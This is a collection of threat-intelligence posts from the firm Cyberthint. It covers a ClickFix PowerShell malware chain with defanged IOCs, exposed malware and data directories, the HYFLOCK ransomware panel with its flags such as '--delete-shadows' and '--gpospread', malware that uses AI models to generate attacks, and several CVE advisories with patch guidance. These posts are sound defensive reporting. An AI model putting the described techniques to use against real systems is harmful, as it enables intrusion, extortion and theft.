Cyberthint

You can follow #darkweb forum activities, #ransomware groups' publications, defaced websites, new #vulnerabilities/#exploits and #cybersecurity #news on a single channel!🤳🧐 Our #Telegram channel (Cyberthint's Dark Monitor t.me/cyberthint) is live, join to us!💪

During our routine threat hunting activities, we detected a new active #ClickFix campaign. Typical; what initially appears to be "robot verification" is actually direct malware distribution. ATTACK CHAIN 1️) Fake verification page → 151.243.18[.]254 2️) User is prompted to run a PowerShell command 3️) The Base64 encoded command script is decoded and connected to C2 → 94.26.83[.]199 4️) Payload is downloading → /download CRITICAL POINTS - The file name changes with each download: "imagetransfer.exe", "audiobackup.exe", "archive_report.exe", "new-photo.exe" - Each downloaded file has a different name but the same SHA256 hash - TLS SNI Camouflage: "ecs.office.com", "cdn.steamstatic.com" TECHNICAL BEHAVIORS Base64 encoding, obfuscation, payload download via PowerShell, %TEMP% drop, silent execution with "-WindowStyle Hidden", console hiding, runtime parsing (GetProcAddress) CAPABILITIES Persistence (registry + startup), clipboard data collection, webcam access, file system discovery, command execution. #IOCs IPs: 151.243.18[.]254, 94.26.83[.]199 Paths: /check, /download Hash (SHA256): 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run #threathunting #malwareanalysis #powershell #blueteam #soc #dfir #ioc #cyberthreat #cyberthint

The New Model of Threat Actors: AI-Powered 0-Day Operations As the Cyberthint Team, we have analyzed cases where artificial intelligence is no longer used merely as an advisor for attackers, but as a direct operator. Campaigns documented in the fourth quarter of 2025 demonstrate that the discovery of a zero-day vulnerability has evolved from a specialized process taking months to one that can be automated in a matter of minutes. Featured Cases: - GTG-1002 (Chinese state-sponsored): 80-90% of the operation was delegated to AI, AI discovered and exploited a 0-day vulnerability in live operation. - LAMEHUG (APT28 / GRU 26165): A malware that generates commands at runtime by sending queries to the Qwen2.5-Coder model via Hugging Face. - MalTerminal: The earliest identified example of its kind, generating ransomware and reverse shell code on runtime using GPT-4. - PROMPTFLUX: A polymorphic dropper that rewrites its source code hourly using the Gemini API. Why the current classical detection model is insufficient, what the defense side should invest in, the operational discipline of the actors, and more, all here 🔗cyberthint.io/the-new-operat… #CyberSecurity #ThreatIntel #AIThreats #ZeroDay #APT28 #GTG1002 #MalwareAnalysis #LLMSecurity #Infosec #Cyberthint #ThreatHunting #RedTeam #CTI

Thai-Based Malware Staging Server Uncovered During our recent threat hunting operations, we identified an exposed open directory hosted on a Thai ISP infrastructure, serving on a non-standard port. What initially appeared as a misconfigured Lighttpd server quickly revealed a far more concerning picture upon deeper analysis. 🧩 Infrastructure Fingerprint • Host: 183.89.248.17[:]60000 • Web Server: Lighttpd on Debian GNU/Linux • ISP: Triple T Broadband (3BB), Nonthaburi, Thailand ⚠️ Malicious Artifacts Identified Static analysis of the binary retrieved from the directory revealed the following indicators: - ELF Binaries (Linux x86-64 — GCC Debian 10.2.1); "case-kkthai" Two separate ELF executables with identical import tables but differing obfuscated string blocks — consistent with a build-time payload differentiation pattern: •ptrace + /proc/[PID]/as access → Process Memory Injection capability •argv[0] manipulation with hardcoded failure string "E: neither argv[0] nor $_ works." → Process Cloaking attempt •fork + execvp + waitpid chain → Daemonization & Persistence mechanism •putenv + getenv → Runtime environment manipulation #CTI #ThreatIntelligence #ThreatHunting #MalwareAnalysis #OpenDirectory #InfoSec #CyberSecurity #ProcessInjection #ELF #Thailand #opendir

Critical Data Exposure: Unprotected ERP Database & KYC Documents Discovered During our threat hunting operations, we identified an open directory at the address "148.66.129[.]125." This situation appears to have a much greater impact than a typical misconfiguration. 📂 What's Exposed? This server is not just misconfigured — it appears to be an actively used ERP/MDM (Master Data Management) system (‘simpmdmExpro’) with its entire backend left publicly accessible: - ‘material_master_128167.sql’ — Full material master database dump - ‘duplicate_records_50000_99999.sql’ — 50K+ record dataset - ‘simpmdmExpro_contabo_10_april.sql’ — Live production database backup - ‘simpmdmExpro.zip’ — Complete application archive - ‘/simpmdm/’ — Live application directory ⚠️ Most Critical Finding: KYC Document Leak Example; Inside the exposed zip file, the path ‘simpmdmExpro/UploadDocument/KYC/’ contains hundreds of sensitive identity & financial documents: - Customer invoices (2023–2025) - Financial statements - Identity verification documents (PNG/JPEG scans) - Internal request and communication files #CTI #ThreatIntelligence #DataLeakage #InfoSec #CyberSecurity #ThreatHunting #OpenDirectory #opendir #GDPR

#HYFLOCK #Ransomware #RaaS

New RaaS Platform Discovered: HYFLOCK In our recent extensive threat hunting operations, we uncovered a new, previously undocumented RaaS (Ransomware-as-a-Service) platform operating on the Tor network: HYFLOCK (http[:]//e5hdifgit6ua7k4ggmltume7kbyryksdnlrkc55we33fnshgxfeqgsyd[.]onion/) Our team not only mapped the outer surface of the target (traces like Chinese comment lines hidden in CSS files), but also went behind the authentication layer, directly accessing the operational management panel and the current user manuals (v1.0.0) used by cybercriminals. This firsthand intelligence clearly reveals the corporate workings of modern ransomware groups. Here are the critical findings we've uncovered from the depths of Operation HYFLOCK: 🔍 Cross-Platform Builder Automation: Affiliates can log into the panel and compile target-specific malware (encryptor) within minutes. The system supports Windows, Linux/NAS, and ESXi platforms. A new hash is generated with each compilation, rendering static analysis security measures ineffective. ⚙️ Advanced Operating Parameters: The parameters included in the guide show how attackers adapt their tactics (TTPs) depending on the target: "--gpospread": Automatic deployment via GPO in Active Directory environments (with Domain Admin privileges). "--network-only": Only encrypt network shares and cloud storage areas. "--delete-shadows": Deleting shadow copies prevents recovery. 💰 Trustless Business Model and Separation of Powers: The system operates with an 80% affiliate commission and a 20% platform commission. The most notable OPSEC (Opposition-to-Personal Security) measure is that affiliates never have access to the decryptor. Once negotiations are complete, the key is directly transmitted to the victim by the system administrators. This strict rule prevents commission evasion while also protecting infrastructure administrators. 🌐 Underground Market: HYFLOCK is not just a ransomware panel; it also houses an integrated marketplace ecosystem where attackers can buy and sell exploit code, leaked databases, and privilege escalation tools among themselves. The traces of Chinese developers we identified in the code structure and the global marketing of the platform with Russian/English interfaces demonstrate the latest stage in international subcontracting within the cybercrime world. The images show the panel's internal interface and details of the directory used by the attackers among themselves. #CTI #ThreatIntelligence #Ransomware #HYFLOCK #RaaS #CyberSecurity #InfoSec #MalwareAnalysis #ThreatHunting #Cybercrime

New #Wallet #Drainer Campaign Aimed at Developers! Attackers are exploiting the #GitHub notification infrastructure and #Google Share redirections using as a weapon to bypass email security filters. #Web3 developers carefully selected via #OSINT are lured to a fake #OpenClaw #Airdrop page, where their wallets are instantly drained. Detailed technical analysis, TTPs, and an #IoC list are available in our research report: 🔗 cyberthint.io/lotl-threat-in… #CyberSecurity #Web3 #WalletDrainer #GitHub #CTI #Phishing #Cyberthint #ThreatIntel #ThreatIntelligence

We discovered a new BEC infrastructure: What happens when a 20-year-old domain is used in a BEC attack? An analysis of a phishing attack using a malicious SVG File. The "001VIEW_Remittance_Advice.svg" file we analyzed is malware disguised as a remittance advice. It contains JavaScript obfuscated with XOR and Base64. ... 📝 You can read our analysis here: cyberthint.io/what-happens-w… #BEC #Phishing #ThreatIntel #Cyberthint #CyberSecurity #InformationSecurity

KarstoRat Malware Analysis: A Small Bug Revealed the Developer! We have completed our comprehensive investigation into KarstoRat, an advanced modular malware first detected in February 2026. In the world of cybercrime, anonymity is often an illusion. Sometimes, a single digital footprint can be enough to bring down an entire operation. 📌 Full Technical Report: cyberthint.io/case-study-kar… 🛡️ Detection Rules (Sigma, Yara, Snort) now available in our repo: github.com/cyberthint/Det… #CyberSecurity #KarstoRat #ThreatIntel #MalwareAnalysis #Infosec #OSINT #CyberEspionage #DigitalForensics #DetectionEngineering

ZeroDayRAT - Mobile Espionage and Financial Theft Platform As the Cyberthint research team, we analyzed a new mobile threat called ZeroDayRAT, which is being marketed in the Telegram underworld and claims to target both Android and iOS devices with a 1-click attack. 🔍 Key Findings: - Capabilities: Live camera/microphone monitoring, Keylogger, and Crypto Wallet theft (Clipboard Injection). - Distribution: Security filters are bypassed using shortened links via WhatsApp and GitHub Pages. - HUMINT Analysis: The seller accepts the XSS Forum Escrow service for credibility. This threat straddles the fine line between a genuine MaaS operation and scam marketing. Detailed technical analysis and IoCs in our report. 🔗 cyberthint.io/zerodayrat-a-n… #ZeroDayRAT #CyberSecurity #MobileSecurity #ThreatIntel #MalwareAnalysis #Infosec #Android #iOS #Cyberthint #MobileThreat #Espionage

🚀 The Anticipated Report is Out: 2025 Global Cyber Threat Intelligence and 2026 Forecasts 2025 was a year that changed the rules of the game in cybersecurity. Attackers are no longer just encrypting data; they are halting production lines and crippling supply chains. In our 2025 Global Cyber ​​Threat Intelligence Annual Report, prepared by the Cyberthint Threat Hunters team, we analyze the most critical incidents of the past year, address security vulnerabilities, and shed light on the cyber threats and AI-versus-AI war that await us in 2026. 📊 What's in Store for You in the Report? 🔹 Ransomware Evolution: Behind the scenes of the Jaguar Land Rover and Ingram Micro attacks and Operational Shutdown tactics. 🔹 Black Market 2025: The shift from identity theft to session hijacking. Why is MFA no longer sufficient? 🔹 Zero-Day Exploits: The rise of access brokers and 2025's most critical vulnerabilities (Ivanti, Oracle EBS, Fortinet, and etc.). 🔹 2026 Predictions: AI-SOC structures making decisions independent of human intervention and autonomous attack agents. 🔹 And furthermore... This report is not just a situation assessment; it is a roadmap for your 2026 strategy. 📥 You can visit our webpage to read or download the report: cyberthint.io/global-cyber-t… #CyberSecurity #CTI #ThreatIntelligence #Ransomware #AI #Cyberthint #Infosec #2025Report #CISO

"Frogblight" Banking #Malware Targeting #Türkiye We analyzed #Frogblight, a new Android malware targeting users in Türkiye and spreading via fake "e-ifade/ Dava Dosyası" applications. 🔍 Technical Insights & Origin: - Infection: Fake UYAP links sent via SMS. - Capabilities: Steals bank credentials and SMS messages (OTP) via WebView injection. - Critical Findings: Turkish comment lines were found in the malware's source code. Additionally, our GitHub analysis indicates that the attackers are linked to the dangerous Coper (MaaS) malware and may be part of an experienced criminal network. 🔗Detailed technical analysis and IoC list are available: cyberthint.io/there-is-a-law… #Frogblight #AndroidMalware #CyberSecurity #CTI #ThreatIntel #BankingTrojan #MalwareAnalysis #fr0g #Coper

Actively Attacks Observed on #FortiGate Devices! The CVE-2025-59718 and CVE-2025-59719 vulnerabilities (CVSS 9.8) affecting #Fortinet products (FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager) allow attackers to bypass authentication entirely by manipulating SAML SSO, thereby gaining admin privileges. ⚠️Status: Active Exploitation has been observed. Attackers are exporting device configurations. Our technical analysis and urgent defense/monitoring steps are published in our blog. 🔗 cyberthint.io/actively-attac… #CyberAttack #CVE_2025_59718 #AuthBypass #CTI #Cybersecurity #Cyberthint #ThreatIntelligence

Critical LPE (CVE-2025-66430) Vulnerability for #Plesk 👉 cyberthint.io/critical-privi… A local privilege escalation (LPE) vulnerability identified as "CVE-2025-66430" with a "CVSS 9.1" severity score has been detected in the widely used Plesk platform. This vulnerability allows any Plesk user with limited privileges to inject malicious data into the Apache configuration, enabling them to execute arbitrary commands on the server with "root" privileges. This poses a risk of cross-contamination to all server commands and customer data, particularly in shared hosting environments. ACTIONS: - Patch Application: Micro-updates released for Plesk versions 18.0.70 – 18.0.74 must be applied immediately and without delay. - Access Control: Access to the Password-Protected Directories feature must be restricted to authorized personnel only. - Anomaly Monitoring: SIEM monitoring rules must be defined immediately for root command execution attempts originating from restricted Plesk accounts. #Plesk #CVE_2025_66430 #LPE #ServerSecurity #CTI #CyberSecurity #threatintel #threatintelligence #infosec #vulnerability #Cyberthint

The failed "insider" attempt targeting CrowdStrike was not an isolated incident; it was a harbinger of a strategic shift. Following a failed $25,000 bribery attempt, the group changed tactics and is now focusing on hybrid cloud infrastructures. Our analysis shows that the Scattered LAPSUS$ Hunters (SLH) group has abandoned its "affiliate" model and transitioned to its own RaaS infrastructure, the "ShinySp1d3r" platform. 🚩 Highlights from the Report: - Strategic Shift: The failed intrusion attempt pushed the group toward a more aggressive "Initial Access" process. - New TTPs: The attack vector shifted from Windows AD to Linux/LDAP configurations and SSH keys (.pem). - Targets: Telecom and BPO giants, particularly in "Five Eyes" countries. For details on this new structure and technical analysis, check out our article 👉 cyberthint.io/the-strategic-… #ThreatIntelligence #CrowdStrike #ShinySp1d3r #InsiderThreat #LAPSUS$ #CyberSecurity #InfoSec #RaaS

North Korean "Synthetic Employees": Next-Generation Infiltration Operations Masked with Artificial Intelligence As of 2025, North Korea-linked threat actors are emerging not only through financial fraud but also through cyber infiltration strategies involving remote recruitment. In this case, the #Lazarus threat actor’s sub-group “Famous Chollima” attempted to secure a position at a Western tech company using fake resumes and AI-based facial filters. 👉 cyberthint.io/north-korean-s…

Apache Tomcat Flaws Allow Remote Code Execution Two high-severity flaws in #ApacheTomcat (CVE-2025-55752 & CVE-2025-55754) pose a significant risk, including potential remote code execution (#RCE). The most critical flaw (CVE-2025-55752, "Important") is a directory traversal vulnerability. This allows attackers to bypass security constraints protecting sensitive directories like "/WEB-INF/" and "/META-INF/". These vulnerabilities affect Apache #Tomcat versions "9, 10, and 11 before" the latest patch. If "PUT" requests are enabled, attackers can exploit this to upload malicious files (e.g., JSP web shells) directly to the server, achieving RCE. The second flaw (CVE-2025-55754) allows console manipulation via malicious log entries. ACTIONS: • Update to Apache Tomcat 9.0.109, 10.1.45, or 11.0.11 immediately. • Review server configurations and ensure "PUT" requests are restricted to trusted users. • SOC teams should monitor for unusual file writes to "/WEB-INF/" or "/META-INF/" directories. #cybersecurity #threatintel #threatintelligence #infosec #vulnerability #CVE #patchmanagement #securityupdate #java

The Iran-backed #MuddyWater (#TA450) #APT group has escalated its cyber espionage operations targeting government, diplomatic, and energy entities in the MENA region (including Turkey) using an advanced toolkit. For details: cyberthint.io/updated-muddyw… #CyberSecurity #ThreatIntelligence #CyberAttack #InfoSec #CTI

🚨 MS Windows Remote Access Connection Manager (RasMan) Service 0-Day Vulnerability Actively Exploited in Attacks Our technical report on Windows RasMan (CVE-2025-59230) has been published. Microsoft patched the vulnerability on October 14, 2025; however, unpatched systems still pose a high risk. This vulnerability affects multiple Windows versions and has therefore attracted the attention of threat actors targeting enterprise environments. The report details the technical aspects of the vulnerability, the threat actor perspective, rapid detection, and emergency mitigation steps. It includes an actionable playbook for SOC and IT teams. Our recommendation is to update all your systems and run a 30-day retroactive security audit. #CyberSecurity #ThreatIntelligence #CVE2025_59230 #ZeroDay #Windows #PatchNow #InfoSec #CTI #Ransomware cyberthint.io/windows-rasman…

A New RCE Vulnerability for 7-Zip Two high-severity flaws in #7Zip (CVE-2025-11001 & CVE-2025-11002, CVSS 7.0) allow a crafted ZIP file to abuse symbolic links and write outside the extraction folder, leading to potential code execution with user privileges. These vulnerabilities affect all versions before 25.00 on #Windows, #macOS, and #Linux. Attackers could drop payloads into startup or system paths via a single extract action. Such vulnerabilities in 7-Zip provide attackers with an opportunity to launch social engineering attacks via email. ACTIONS: • Update to 7-Zip 25.00 immediately. • Avoid extracting files from untrusted sources. • SOC teams should monitor for unusual writes to startup or system directories after extraction. #cybersecurity #threatintel #infosec #7zip #vulnerability #CVE #zeroday #patchmanagement #securityupdate